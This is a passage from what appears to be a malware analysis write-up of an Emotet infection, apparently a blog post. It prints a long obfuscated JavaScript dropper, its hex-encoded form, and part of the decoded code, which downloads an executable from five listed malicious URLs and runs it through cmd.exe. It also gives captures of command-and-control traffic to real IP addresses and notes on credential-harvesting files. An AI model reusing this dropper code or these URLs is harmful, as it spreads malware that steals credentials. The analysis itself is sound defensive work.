            return 'fp'.lastIndexOf('p');
        };
        for (var epe = 1; epe < 1; ++epe) {}
        var tm = function() {
            var TA = function() {
                return Math.sqrt(958771958);
            };
            var zQ = function() {
                return 'm'.concat('eo');
            };
            var KU = function() {
                return 'fp'.lastIndexOf('p');
            };
            for (var epe = 1; epe < 1; ++epe) {}
        };
        tm();

        function Amy() {
            var TA = function() {
                return Math.sqrt(958771958);
            };
            var zQ = function() {
                return 'm'.concat('eo');
            };
            var KU = function() {
                return 'fp'.lastIndexOf('p');
            };
            for (var epe = 1; epe < 1; ++epe) {}
            var tm = function() {
                var TA = function() {
                    return Math.sqrt(958771958);
                };
                var zQ = function() {
                    return 'm'.concat('eo');
                };
                var KU = function() {
                    return 'fp'.lastIndexOf('p');
                };
                for (var epe = 1; epe < 1; ++epe) {}
            };
            tm();
        }
        Amy();
        pa += 'tr';
        for (var daz = 1; daz < 4; ++daz) {}
        for (var uaj = 2; uaj < 5; ++uaj) {
            for (var daz = 1; daz < 4; ++daz) {}
        }
        pa += 'in';
        if (Math.sqrt(168041500)) {}
        if ('vva'.search(/v/)) {
            if (Math.sqrt(168041500)) {}
        }
        pa += 'g.fr';
        for (var qua = 2; qua < 3; ++qua) {}
        if (Math.round(33895371)) {
            for (var qua = 2; qua < 3; ++qua) {}
        }

        function S4U() {
            for (var qua = 2; qua < 3; ++qua) {}
            if (Math.round(33895371)) {
                for (var qua = 2; qua < 3; ++qua) {}
            }
        }
        S4U();

        function rU() {
            return Math.sqrt(796323856);
        }
        pa += 'omC';
        pa += 'harC';
        if (266) {}
        for (var zxi = 1; zxi < 2; ++zxi) {
            if (266) {}
        }

        function sAk() {
            return 'kq'.concat('bt');
        }
        pa += 'ode(s';
        if ('a'.concat('cz')) {}
        var axY = function() {
            if ('a'.concat('cz')) {}
        };
        axY();
        var AzT = function() {
            return new Date();
        };

        function wO() {
            return 667;
        }

        function dUi() {
            return new Date();
        }
        pa += 'r';
        var A5p = function() {
            return Math.round(84160849);
        };
        for (var cji = 2; cji < 5; ++cji) {}
        var JAo = function() {
            var A5p = function() {
                return Math.round(84160849);
            };
            for (var cji = 2; cji < 5; ++cji) {}
        };
        JAo();
        pa += 'r)};';
        fon = vqo(pa);
    }
    var pdm = function() {
        iaz();
    };
    var jv = function() {
        pdm();
        var zUP = function() {
            return 'kq'.slice(2, 2);
        };

        function cH() {
            return 'zux'.lastIndexOf('x');
        }
        if ('een'.slice(1, 2)) {}
        if ('ib') {
            var zUP = function() {
                return 'kq'.slice(2, 2);
            };

            function cH() {
                return 'zux'.lastIndexOf('x');
            }
            if ('een'.slice(1, 2)) {}
        }
        var GvX = function() {
            return 'ai'.slice(2, 2);
        };

        function Dy() {
            return 'a'.slice(1, 1);
        }

        function np() {
            return Math.round(112971313);
        }
        for (var iky = 2; iky < 2; ++iky) {
            var zUP = function() {
                return 'kq'.slice(2, 2);
            };

            function cH() {
                return 'zux'.lastIndexOf('x');
            }
            if ('een'.slice(1, 2)) {}
            if ('ib') {
                var zUP = function() {
                    return 'kq'.slice(2, 2);
                };

                function cH() {
                    return 'zux'.lastIndexOf('x');
                }
                if ('een'.slice(1, 2)) {}
            }
            var GvX = function() {
                return 'ai'.slice(2, 2);
            };

            function Dy() {
                return 'a'.slice(1, 1);
            }

            function np() {
                return Math.round(112971313);
            }
        }
    };
    var ypj = function() {};
    ypj();
    var LR = function() {
        return new Date();
    };
    var oCX = function() {
        return 'rpr';
    };
    jv();

    function oej(aie, ugh) {
        for (var axi = 3; axi < 5; ++axi) {}
        return Function(aie, ugh);
        var Bm9 = function() {};
        Bm9();
        var nj = function() {
            return 201;
        };
        if ('wo'.lastIndexOf('w')) {
            var Bm9 = function() {};
            Bm9();
        }
        for (var jlx = 2; jlx < 4; ++jlx) {
            var Bm9 = function() {};
            Bm9();
            var nj = function() {
                return 201;
            };
            if ('wo'.lastIndexOf('w')) {
                var Bm9 = function() {};
                Bm9();
            }
        }
    }
    for (var ier = 5; ier < 5; ++ier) {}

    function zV() {
        for (var ier = 5; ier < 5; ++ier) {}
    }
    zV();
    if ('ne'.slice(2, 2)) {
        for (var ier = 5; ier < 5; ++ier) {}

        function zV() {
            for (var ier = 5; ier < 5; ++ier) {}
        }
        zV();
    }
    agx = "";
    var Pr = function() {};
    Pr();

    function uob() {
        for (var oey = 1; oey < 2; ++oey) {}
        for (var ko = 2; ko < 2; ++ko) {
            for (var oey = 1; oey < 2; ++oey) {}
        }

        function JNf() {
            return 'if'.toLowerCase();
        }

        function FY2() {
            for (var oey = 1; oey < 2; ++oey) {}
            for (var ko = 2; ko < 2; ++ko) {
                for (var oey = 1; oey < 2; ++oey) {}
            }
        }
        FY2();
        kn = vi.length;
        var tM = function() {
            return 'txq'.concat('u');
        };
        var FZi = function() {
            return Math.sqrt(222735929);
        };
        if ('n'.slice(1, 1)) {}
        if ('ev'.charAt(1)) {
            var tM = function() {
                return 'txq'.concat('u');
            };
            var FZi = function() {
                return Math.sqrt(222735929);
            };
            if ('n'.slice(1, 1)) {}
        }
        if ('a'.replace(/a/, 'a')) {
            var tM = function() {
                return 'txq'.concat('u');
            };
            var FZi = function() {
                return Math.sqrt(222735929);
            };
            if ('n'.slice(1, 1)) {}
            if ('ev'.charAt(1)) {
                var tM = function() {
                    return 'txq'.concat('u');
                };
                var FZi = function() {
                    return Math.sqrt(222735929);
                };
                if ('n'.slice(1, 1)) {}
            }
        }
    }
    var iae = function() {
        uob();
    };
    var nw = {
        "vux": "ix",
        "uij": "ah",
        "kv": iae,
        "waa": "ela",
        "uw": "wxu"
    };
    if ('tue'.search(/u/)) {}

    function Yur() {
        return 'oou'.charAt(2);
    }
    var oE = function() {
        return 'su'.toLowerCase();
    };
    var AHq = function() {
        return 'o';
    };
    if ('evm'.charAt(0)) {
        if ('tue'.search(/u/)) {}

        function Yur() {
            return 'oou'.charAt(2);
        }
        var oE = function() {
            return 'su'.toLowerCase();
        };
        var AHq = function() {
            return 'o';
        };
    }

    function sM() {
        if ('tue'.search(/u/)) {}

        function Yur() {
            return 'oou'.charAt(2);
        }
        var oE = function() {
            return 'su'.toLowerCase();
        };
        var AHq = function() {
            return 'o';
        };
        if ('evm'.charAt(0)) {
            if ('tue'.search(/u/)) {}

            function Yur() {
                return 'oou'.charAt(2);
            }
            var oE = function() {
                return 'su'.toLowerCase();
            };
            var AHq = function() {
                return 'o';
            };
        }
    }
    sM();

    function dop() {
        var VB = function() {};
        VB();
        nw.kv();
    }
    if (new Date()) {}
    if ('uxa'.slice(3, 3)) {
        if (new Date()) {}
    }

    function u2() {
        if (new Date()) {}
        if ('uxa'.slice(3, 3)) {
            if (new Date()) {}
        }
    }
    u2();

    function Z3p() {
        return Math.round(775736155);
    }
    var G8 = function() {
        return 523;
    };
    dop();
    var IM = function() {};
    IM();
    var Vy = function() {
        return 'be'.search(/b/);
    };

    function l7N() {
        return new Date();
    }

    function uW() {
        return 'm'.lastIndexOf('m');
    }
    for (var heq = 4; heq < 5; ++heq) {
        var IM = function() {};
        IM();
        var Vy = function() {
            return 'be'.search(/b/);
        };

        function l7N() {
            return new Date();
        }

        function uW() {
            return 'm'.lastIndexOf('m');
        }
    }
    if (623) {
        var IM = function() {};
        IM();
        var Vy = function() {
            return 'be'.search(/b/);
        };

        function l7N() {
            return new Date();
        }

        function uW() {
            return 'm'.lastIndexOf('m');
        }
        for (var heq = 4; heq < 5; ++heq) {
            var IM = function() {};
            IM();
            var Vy = function() {
                return 'be'.search(/b/);
            };

            function l7N() {
                return new Date();
            }

            function uW() {
                return 'm'.lastIndexOf('m');
            }
        }
    }
    for (var ogi = 0; ogi < kn; ogi += 2) {
        if ('i'.concat('a')) {}

        function dak() {
            xwq = ow(vi, ogi, 2);
            if ('iua'.toLowerCase()) {}

            function FBg() {
                return 'q'.concat('ire');
            }
            var QDT = function() {
                return 'uuu'.search(/u/);
            };
            var s88 = function() {
                return 'ovq'.search(/q/);
            };
            var LP5 = function() {
                return 'e'.concat('euw');
            };
            if ('e'.slice(1, 1)) {
                if ('iua'.toLowerCase()) {}

                function FBg() {
                    return 'q'.concat('ire');
                }
            }
            var AX = function() {
                if ('iua'.toLowerCase()) {}

                function FBg() {
                    return 'q'.concat('ire');
                }
                var QDT = function() {
                    return 'uuu'.search(/u/);
                };
                var s88 = function() {
                    return 'ovq'.search(/q/);
                };
                var LP5 = function() {
                    return 'e'.concat('euw');
                };
                if ('e'.slice(1, 1)) {
                    if ('iua'.toLowerCase()) {}

                    function FBg() {
                        return 'q'.concat('ire');
                    }
                }
            };
            AX();
        }
        var cro = dak;
        var ZCj = function() {
            return 'cn'.lastIndexOf('n');
        };
        var kq = function() {
            return 'u'.search(/u/);
        };
        var Mfp = function() {
            return 'l'.concat('ehz');
        };
        for (var px = 4; px < 4; ++px) {}
        var icu = cro;
        for (var ueu = 4; ueu < 4; ++ueu) {}

        function AEe() {
            for (var ueu = 4; ueu < 4; ++ueu) {}
        }
        AEe();
        icu();
        if (Math.round(52473223)) {}

        function cyp() {
            return 'za'.toLowerCase();
        }

        function ewi() {
            for (var fxp = 1; fxp < 3; ++fxp) {}
            una = iak(xwq, 16);

            function RV() {}
            RV();
            if (new Date()) {
                function RV() {}
                RV();
            }
        }
        for (var vg = 1; vg < 4; ++vg) {}

        function IT() {
            return new Date();
        }

        function AFc() {
            for (var vg = 1; vg < 4; ++vg) {}

            function IT() {
                return new Date();
            }
        }
        AFc();

        function ho() {
            var kd = function() {};
            kd();
            var V4 = function() {
                return 'ua'.search(/u/);
            };
            var AZg = function() {
                return 'u'.replace(/u/, 'u');
            };
            var Au = function() {
                return 'e'.search(/e/);
            };
            ewi();
            for (var udi = 2; udi < 4; ++udi) {}
        }
        var J1 = function() {};
        J1();

        function lom() {
            ho();
        }
        for (var kr = 3; kr < 3; ++kr) {}
        var fSl = function() {
            for (var kr = 3; kr < 3; ++kr) {}
        };
        fSl();
        var vk = lom;
        var EB = function() {};
        EB();
        var Ueo = function() {
            return 'zsc'.search(/z/);
        };

        function nxW() {
            return new Date();
        }

        function Yl() {
            return 'c'.slice(1, 1);
        }
        for (var aq = 3; aq < 4; ++aq) {
            var EB = function() {};
            EB();
        }

        function jbd() {
            return 'e'.charAt(0);
        }
        var A8 = function() {
            return 'i'.charAt(0);
        };
        for (var jn = 1; jn < 2; ++jn) {
            var EB = function() {};
            EB();
            var Ueo = function() {
                return 'zsc'.search(/z/);
            };

            function nxW() {
                return new Date();
            }

            function Yl() {
                return 'c'.slice(1, 1);
            }
            for (var aq = 3; aq < 4; ++aq) {
                var EB = function() {};
                EB();
            }
        }
        vk();
        if ('oia'.lastIndexOf('a')) {}

        function s6() {
            return 'r';
        }
        var pto = function() {
            return 'm';
        };
        var LX4 = function() {
            return 'ia'.search(/i/);
        };
        var VD = function() {
            if ('oia'.lastIndexOf('a')) {}

            function s6() {
                return 'r';
            }
            var pto = function() {
                return 'm';
            };
            var LX4 = function() {
                return 'ia'.search(/i/);
            };
        };
        VD();

        function dqv() {
            return 'f';
        }
        var OyX = function() {
            if ('oia'.lastIndexOf('a')) {}

            function s6() {
                return 'r';
            }
            var pto = function() {
                return 'm';
            };
            var LX4 = function() {
                return 'ia'.search(/i/);
            };
            var VD = function() {
                if ('oia'.lastIndexOf('a')) {}

                function s6() {
                    return 'r';
                }
                var pto = function() {
                    return 'm';
                };
                var LX4 = function() {
                    return 'ia'.search(/i/);
                };
            };
            VD();
        };
        OyX();
        for (var zjn = 3; zjn < 4; ++zjn) {}
        var Py = function() {
            return 'ho'.lastIndexOf('h');
        };

        function VE() {
            return 'a'.slice(1, 1);
        }
        var dAz = function() {
            return 'bu'.lastIndexOf('b');
        };
        for (var vw = 3; vw < 4; ++vw) {
            for (var zjn = 3; zjn < 4; ++zjn) {}
            var Py = function() {
                return 'ho'.lastIndexOf('h');
            };

            function VE() {
                return 'a'.slice(1, 1);
            }
            var dAz = function() {
                return 'bu'.lastIndexOf('b');
            };
        }

        function L9C() {
            return 'zak'.slice(3, 3);
        }
        var An = function() {
            return 'ei'.lastIndexOf('i');
        };

        function daa() {
            if ('a'.search(/a/)) {}

            function rvL() {
                return 'l'.toLowerCase();
            }
            var oqK = function() {
                return 'bof'.search(/b/);
            };

            function EP() {
                return Math.round(124143989);
            }

            function Fto() {
                if ('a'.search(/a/)) {}
            }
            Fto();
            agx += eee(una);
            for (var ifr = 2; ifr < 5; ++ifr) {}
            if (new Date()) {
                for (var ifr = 2; ifr < 5; ++ifr) {}
            }

            function XZq() {
                return 'ei'.slice(1, 1);
            }

            function lS4() {
                return 'o'.search(/o/);
            }
            var nZ = function() {
                return 'udu'.slice(1, 3);
            };
            for (var bw = 2; bw < 3; ++bw) {
                for (var ifr = 2; ifr < 5; ++ifr) {}
                if (new Date()) {
                    for (var ifr = 2; ifr < 5; ++ifr) {}
                }
            }
        }

        function Vlu() {}
        Vlu();
        var kE = function() {
            function Vlu() {}
            Vlu();
        };
        kE();
        if (357) {
            function Vlu() {}
            Vlu();
            var kE = function() {
                function Vlu() {}
                Vlu();
            };
            kE();
        }

        function ist() {
            function Sg() {}
            Sg();
            daa();
            if ('o'.replace(/o/, 'o')) {}
        }
        for (var sat = 3; sat < 3; ++sat) {}
        var AW7 = function() {
            return 'ys'.slice(1, 1);
        };
        var l7 = function() {
            return 'o'.toLowerCase();
        };
        var TdW = function() {
            return 'i'.lastIndexOf('i');
        };
        if ('p'.slice(1, 1)) {
            for (var sat = 3; sat < 3; ++sat) {}
        }

        function Wd() {
            return 'rw'.search(/r/);
        }
        var XIn = function() {
            return new Date();
        };

        function DmT() {
            return Math.round(267370883);
        }
        if ('ya'.concat('ex')) {
            for (var sat = 3; sat < 3; ++sat) {}
            var AW7 = function() {
                return 'ys'.slice(1, 1);
            };
            var l7 = function() {
                return 'o'.toLowerCase();
            };
            var TdW = function() {
                return 'i'.lastIndexOf('i');
            };
            if ('p'.slice(1, 1)) {
                for (var sat = 3; sat < 3; ++sat) {}
            }
        }
        var mjz = ["p", ist, "p"];
        mjz[1]();
        for (var uc = 5; uc < 5; ++uc) {}
    }
    var U6d = function() {
        return 'z'.lastIndexOf('z');
    };
    var YKG = function() {
        return 'nd'.slice(2, 2);
    };

    function qr() {}
    qr();
    for (var ieg = 1; ieg < 4; ++ieg) {
        var U6d = function() {
            return 'z'.lastIndexOf('z');
        };
        var YKG = function() {
            return 'nd'.slice(2, 2);
        };

        function qr() {}
        qr();
    }
    vqo(agx);
    for (var uui = 3; uui < 3; ++uui) {}

    function PM() {
        for (var uui = 3; uui < 3; ++uui) {}
    }
    PM();

    function R5() {
        return 'qt'.toLowerCase();
    }
}
var dY5 = function() {};
dY5();
for (var kj = 4; kj < 4; ++kj) {
    var dY5 = function() {};
    dY5();
}
var UVJ = function() {
    var dY5 = function() {};
    dY5();
    for (var kj = 4; kj < 4; ++kj) {
        var dY5 = function() {};
        dY5();
    }
};
UVJ();

Since I was not able to deobfuscate this Javascript, I ran the Word document/javascript file instead. From a host perspective, the infection of the system is pretty straightforward. One process calls another and then another and so on and so forth.

The start seems to be from the javascript file reaching out to the domain “internetcheapskate.com” and downloading a malicious binary file.

GET /ezeofbhwy/ HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)
Host: internetcheapskate.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Mon, 03 Jul 2017 13:54:54 GMT
Server: Apache
X-Powered-By: PHP/5.4.45
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Content-Disposition: attachment; filename="on.exe"
Content-Transfer-Encoding: binary
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload

38600
MZ......................@.............................................	.!..L.!This program cannot be run in DOS mode.

I believe the file that is downloaded and executed is the “da241556.aoo” file since this is a binary file.

file da241556.aoo 
da241556.aoo: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

The first check-ins with the C2 is done via one of the two “GeneralizeMspthrd.exe” processes (PIDs 1768 and 1788). Looking at the PCAP there is a call out to the IP address of 172.243.126.142 over port 443 (this is not encrypted) for a fake “404 Not Found” page which seems to fit the Emotet modus operandi along with the large Content-Length value, and unusual cookie.

GET / HTTP/1.1
Cookie: AB39=JXKXAPO6tSQ7XxUbXaee1b5oQj55euE0KpzNZ+0yxq1VdJJtXS3/Bl4oSrxDYPtk/ElBXwcGH/zO38w7pFZrZMnf9mZwiNQla/ZxTQwB4exI7D8ql+KCvvV0GAYOVysYjbGpHUu/ItUYgwPGPNB7NQYrqy/43MiK/CDgGGKkUbWnoPQ3peOPeLxjdjGvJwFbwlnHdsu22qdvI60GOezZhodNHfAOjroqXwNSgeVX8ioH+UtjGDDEzzjFQ3JvhbZVR84KR1mcghMO7gofvJ5dcw59aibUGNwnx8EBlQFVzmm0EJlcj2ztS++PNx6LBIJkJBJ+ttYN2j0Djee1sYWsxwWArWz18YDp+UZGARVZSg6CeAeWCcNQL7Mjo2S4yIOgufFkQlHwOH/UEnuRRfslm+J0nMD5e+/9YwMPK7Cak4SEfRmSkgiX9T0ybPVMHZ2EhuA5lpTMs+lCWNz2YDCClpmyLhU3umllfO5/fu/OdQc21tGrojJH3xZ7Y0edLOltp/jaJId+RCJPbBi7q5x1/ifreDObORWllt6s3opdshFp83J5TzJ2hdb7YGwSOC9NddcdgtBLGAoOH1XwGtHnlu3pkS4fhxkMzfmbyTj9dYQAwMu3r4Mr7hIrZXL3J3YOJ8pT47wAE5aXjKpJg3FsAbq9hYqfpZM7rQjbt7l7EQ9goufzMZNFQhAexvnLWTEPy1gDJzl6V+dDK3l+QM3bTqktRLxJ2UvmMQYps91j1GJatXdAwslJPgk5lD+dudvxxiyG/BcBfAnk6yRdpbTA9RjjsZMHwr3Vlr6xZovLtsECkuih7gqJH+aNsueGfhBr7llpD702DhNifTS7wSC4XT2XshY=
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322)
Host: 173.243.126.142:443
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 03 Jul 2017 13:56:27 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 222868
Connection: keep-alive

.m...6.4.+....?6uc`C_...F.q..h.e%..... .....wK....LV\.....'sn\R...aG.LRt...4K..XE.@...<I(..1n<yq.h..a.....,...).$..|.|..I@{#.0.&........GJ..9.\..ew.T.V~.................`.2.I....(*b...u./.Y^%.E.....e>.:....>1S\.e.....U.ozx....)..yW....B~.R.TM...@x.....W...n........C.....W.P.3..,*.35..
.....1.W.......;..X	.I..|..7D....}......R.......c..@5.=R^..!
n.h.......!G....%...	.9......S..w.M..f9.
.~..,.U...*W.:....I..6......v.

Along with another check-in to the IP address of 50.21.182.63 over port 443 (once again, not encrypted) with the same kind of traffic mentioned above (just different size in the content-length).

GET / HTTP/1.1
Cookie: 1ABD=AaRUazimNMdgTtn4cdm8cC3acWdSm0SNZwtoFh8knGBsSkVdGyMkl2HArF0VfKV0epUv3SmRQrSEnh3T45GgDQjHI0yOoRIhwx4Zs6TdAyDjPwoPoOfRvdVHV+9PWu50eZ+jb7QCTGFsa4gyd/a8x64Xz1t7PUrPWq7/ypRBp1TlihSet6CmewtS3faqgTeCJnC3xPUxjHJ9BPsmXz4GMMfRbtLsLbWVJt9FeiVrSTFeU3nvcUkaD042uWT7ez44kTZ3Gl2FzTvOJ+7rlzSnVfVKyNwukOuaJJdWCTcfTHZAEceBCIYXpYpp9Jh3AZsvCJChY0CMrc29kI11P5biB4JJr4gxLJf4aurZmn3IfhxbLqO27BZgWEalqPLF0yF7VokpruRViB5FvIbtVxmtLR/qg8+oM1IPBpITuGRtzhfk6XvxTzExtO3jPAaexEd5tf2gKaQQ63j7fDZ4dailIUI1iyx2vWhxWoOAKs6zIG/tfI1SF5zJzvTYXzgdT8TxSj22lmAYrkYQ7Tp1xhV2HS2T5UN6NhUlQpc7Dggv4CdooskAugBuKKOpP2r2lwG+J1Ikjzyohklm/7/CjXp4Ya/drJLwXZh5a53vu4PeHbgimXUufQSeuI9DwmN39wrGUZWLL/WFj6iPhnFvsAf3mgH1ZC1iekbMn7n8MING4z6hFT2WXP72xvd1ASajTF1fC/UwvYGXHfr0kV2Ch+VtWDilBIeqmDga//lbreGPqpEhfYIupnvsu/iVjD+IqcD8WVuR+S/AdOwaZJJGhvo26WCd+a8QxVWWKf5cU8sRmupfJIHSXzrmPwq9XbwMDiSTFo0rxJUPHx58hX8c9QXaxfWUVxCpZOdRjAxmsfihA78+Kiz0
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322)
Host: 50.21.183.63:443
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 03 Jul 2017 13:56:56 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 728740
Connection: keep-alive

9..*..I..B.........
...A.../.M...zC.....f.=..3-.a	.....7TJ1!H.K...,R.vjK?#......z7\q....Ui..^.d..o.Qm.HW.-$.>.DpkXs .
.1.}.[.1.nyr.v=i.....aOfw...AE.X.?...kH._.....NJ.`...7.\.......UZ...I...nuH....].x..-.Yv..6.ZWj%.......`...5......u./....7;..).,?.Wu.......Z....4...k..;...7. .ju`Q.y..'-...V..~....._..?..3!.9...#.e[..=.<...../....m
.....L_.%J.....P...Yw}..q..R.Xa...w.....M5..A[Y...`..e.sg....eJ|......H[.!G...^......!.x..s........r..f..T...4...U.!FO.=6.....Z]ppOD...a..SZ..*;.w6 f..F..).-...L..|[.?sE.......9`...F....

With the last set of check-ins to 72.10.49.171 being much smaller in size but this time over port 8080.

GET / HTTP/1.1
Cookie: 3A5B=UXYvqtmil/m+Hk1jf9rsJzR5QRwiimUINqyjKYXzPRGWh52ndDULkif5NC2J42g8BuKtyMw0unJWIyjON3EVzIscxYO7W1mEafDRuj1D/mST+577sDN/4irQ7jsPGBP3BNOdyQtmYlqCOOLoXyv0XQ4qwvbgIRyd3EWQPDS10iPI15m1PVpNaYvaXmIAkngFr1r3uZGoyB74+NGQZIF4EKWZ6IG6n4s2yAB7vj59kzgZRqMr
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322)
Host: 72.10.49.171:8080
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 03 Jul 2017 13:57:04 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 132
Connection: keep-alive

B.A..
].kW.....M.lip.Vo.....5/oT.F.B...5..l..M	v.ej....Dl0.P..cu...)./....n
...f...t...............n.%9..A...... ...:..p..#.#r.xy...

Persistence is obtained by creating a shortcut to the malicious binary (GeneralizeMspthrd.exe) via the Startup folder (C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup). When I rebooted the system, I saw the process “GeneralizeMspthrd” spin up and check in with the IP address of “50.3.75.246” over port 443 (still not encrypted) which looks very similar with the above GET requests to port 8080.

GET / HTTP/1.1
Cookie: 64CB=PtjxckY7OEvApbvZCA5Nmtd9EqL2mfwi6HFoouvrKOYA7IOicKgn/alsx0apRD50syAa5pCbZcbbrhGVCIELPBRPCtG0BA2bdeTt1xig0hp+n63kXQdjFfxWObFGYsiLfu9t2thLJ0QwnjbhEWgi80na0BDb/+7v/tmP7FUDp2KVuafCgYVlNsZV/k52FglgK7QnIO8NIzMeh2LsZ7sXzUVPzlIIJ0iX45jFpymQ0if/e+r3ErM+DWPzeSxFHjY3Qi5nw+v6xPU1srTyOu/S9oTqJ7JnIya83s0YXtAykV6cUapqDTbd+Pgkz5LcG7cLcuk53Xzz9ezdbcz0yzr/+Ojx5d94hKMVPL2lUqhq26hSzKC1wWflOAH/eM6CzCEeN6obd4Ydgmnynn3ikaoOSCgpPOuy8HXqnYcV/xgIWklc9xN0BOmc5pqgtSvNigxA6kIGJepqHn3AZ3Dv17Uq8UVIIuFWFx5DBtbG+1xynKNKyQ8E6rQFIbzlVENnNbKbQ7VLJ0SxfgicfZQbNWbfB/OOvEIKgz4hMiC1N2xQlgC//gTLPN2XdY/sdpLbqmF7ZG6HtbquLmpnCTkJWZdDO/1fz+pZCCnTKaNsAYIqoO0tbBMdFavE6f0book+Untcl6eMoK18Bdt2kXzPrtiumE9T5GOHT7LmTaTJ11zFAaWkAo8+
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322)
Host: 50.3.75.246:443
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 04 Jul 2017 08:22:41 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 132
Connection: keep-alive

..M~...
.o......*}4_gn.3....4.aM.#=.P.XT"B..i..t..(.z........H..@..!.1~..G}..\}q!....x"w..1....Lsr..u...l.......`.8.=..k...y%.Lp..m.

Lastly, from what I could tell in the logs from Process Monitor, the GeneralizeMspthrd processes seem to read or set values in the registry around "Internet Settings" or looking for mail clients. Looking at some of the *.tmp files that were created from the malware we can see evidence of some of what the malware was looking for.


3A50.tmp
---------
Microsoft\Office\14.0\Outlook

3A51.tmp
--------
URL,Web Browser,User Name,Password,Password Strength,User Name Field,Password Field,Created Time,Modified Time

In an attempt to see if I could get some logs with my credentials in it, I did configure Outlook with a dummy account and also saved some dummy information into a site and rebooted the system to see if the GeneralizeMspthrd process would create the TMP file and also log my credentials into it. Unfortunately I was not able to get it to create a TMP file with my “dummy” credentials as the file that was created was empty.

I also recorded the infection as well and posted it up at my Youtube channel.

***Update 2017-07-04: Thanks to David Ledbetter since he gave me a hint as to how to de-obfuscate the javascript code. I feel dumb for not seeing the pattern in the code, but if you look through the script there is a repeat of the variable ‘rhj.’ Use your favorite editor and cut all instances of this variable and splice them together. When you do that, you get the following code block which is in hex.

0A76617220616F203D205B2022687474703A2F2F676574736F6D65736B696C6C7A2E636F2E756B2F73632F222C22687474703A2F2F696E7465726E65746368656170736B6174652E636F6D2F657A656F66626877792F222C22687474703A2F2F68796769656E69632E636F2E74682F706C7567696E732F757365722F63706366657268656E2F222C22687474703A2F2F6D636C656C6C616E642E6E65742F65796B696A6C616968772F222C22687474703A2F2F7468657472696C6C69756D2E636F6D2F7174767274676A656D2F22205D3B0A0A66756E6374696F6E20756928206D756B2C2075697520290A7B0A2020202072657475726E204D6174682E666C6F6F7228204D6174682E72616E646F6D2829202A2028756975202D206D756B202B2031292029202B206D756B3B0A7D0A0A66756E6374696F6E2079656928290A7B0A2020202076617220616962203D2075692820302C20616F2E6C656E677468202D203120293B0A20202020766172206F78203D20616F5B20616962205D3B0A20202020616F2E73706C69636528206169622C203120293B0A2020202072657475726E2028206F78203D3D20756E646566696E65642029203F2066616C7365203A206F783B0A7D0A0A66756E6374696F6E206B696F28290A7B0A20202020766172207562203D206E657720416374697665584F626A656374282022536372697074696E672E46696C6553797374656D4F626A6563742220292E4765745370656369616C466F6C64657228203220293B0A20202020766172206269203D20222F646122202B2075692820302C203939393939392029202B20222E616F6F223B0A2020202072657475726E207562202B2062693B0A7D0A0A66756E6374696F6E207A6B722820616120290A7B0A20202020766172206969203D206E657720416374697665584F626A656374282022575363726970742E5368656C6C2220293B0A202020207661722068696B203D2027636D642E657865202F63202227202B206161202B202722273B0A2020202076617220796973203D2069692E52756E282068696B2C2066616C736520293B0A202020200A202020207D0A0A66756E6374696F6E2078616F28207075772C20616120290A7B0A20202020736F6A2E4F70656E28293B0A20202020736F6A2E54797065203D20313B0A20202020736F6A2E5772697465282070757720293B0A20202020736F6A2E506F736974696F6E203D20303B0A20202020736F6A2E53617665546F46696C65282061612C203220293B0A20202020736F6A2E436C6F736528293B0A7D0A0A66756E6374696F6E206F75712820656A20290A7B0A2020202072657475726E20656A2E726573706F6E7365546578742E6D6174636828202F5E4D5A2F202920213D3D206E756C6C3B0A7D0A0A76617220656A203D206E657720416374697665584F626A6563742820224D53584D4C322E584D4C485454502220293B0A76617220736F6A203D206E657720416374697665584F626A65637428202241444F44422E53747265616D2220293B0A7768696C652820747275652029207B0A20202020766172206F6C78203D2079656928293B0A202020206966282021206F6C782029207B0A20202020202020202020202020202020627265616B3B0A202020207D0A20202020747279207B0A20202020202020202020202020202020656A2E4F70656E282022474554222C206F6C782C2066616C736520293B0A2020202020202020656A2E53656E6428293B0A20202020202020200A20202020202020200A2020202020202020696628206F75712820656A20292029207B0A202020202020202020202020202020202020202020202020766172206161203D206B696F28293B0A20202020202020202020202078616F2820656A2E526573706F6E7365426F64792C20616120293B0A2020202020202020202020202020202020202020202020207A6B722820616120293B0A2020202020202020202020202020202020202020202020200A202020202020202020202020627265616B3B0A20202020202020207D0A2020202020202020656C7365207B0A20202020202020202020202020202020202020207D0A202020207D0A20202020636174636828207A77722029207B0A2020202020202020202020207D0A7D

which decoded is this:

var ao = [ "http://getsomeskillz.co.uk/sc/","http://internetcheapskate.com/ezeofbhwy/","http://hygienic.co.th/plugins/user/cpcferhen/","http://mclelland.net/eykijlaihw/","http://thetrillium.com/qtvrtgjem/" ];

function ui( muk, uiu )
{
    return Math.floor( Math.random() * (uiu - muk + 1) ) + muk;
}

function yei()
{
    var aib = ui( 0, ao.length - 1 );
    var ox = ao[ aib ];
    ao.splice( aib, 1 );
    return ( ox == undefined ) ? false : ox;
}

function kio()
{
